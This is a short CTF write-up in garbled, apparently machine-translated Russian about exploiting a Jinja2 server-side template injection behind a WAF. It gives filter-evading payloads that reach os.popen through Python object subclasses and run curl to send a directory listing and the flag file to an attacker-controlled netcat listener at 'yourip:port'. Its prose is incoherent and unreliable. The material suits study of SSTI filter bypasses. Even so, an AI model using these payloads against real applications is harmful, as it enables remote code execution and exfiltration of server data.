Входные данные имеют эхо, чтобы увидеть заголовок записываются возвращаемый в питона фоне, спекуляция имеет SSTI (плюс ошибка и PHP index.php режимов маршрутизации не знают, если у меня есть мастер-дурак -), затем последовали вокруг WAF, I написал два фильтра, фильтр сильного матча {{и}}, цель состоит в том, чтобы позволить вам освоить удаленный SSTI ударил флаг на своем собственном сервере.
Тогда простое слово согласующих фильтров ОСЫ и другой чувствительный характер, до тех пор, как FUZZ, другой эксперимент немного, вы обнаружите, что большинство ДОУ не имеет доступ к конфигурации и фильтр в нижней части, чем может быть использована для обхода фильтра.
прослушивает сервер nc -lvp port
Корневая проверка каталога флаг: {% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d ls / | grep flag;') %}1{% endiconfigf %}
прочитать флаг:
{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclasconfigses__()[59].__init__.func_glconfigobals.linecconfigache.oconfigs.popconfigen('curl http://yourip:port/ -d cat /flag_1s_Hera;') %}1{% endiconfigf %}
Они увидели хорошую реферальную ссылку ~ ~
Python инъекции шаблон (SSTI) углубленное исследование
колбы / Jinja2 шаблона привнести некоторую обводную осанку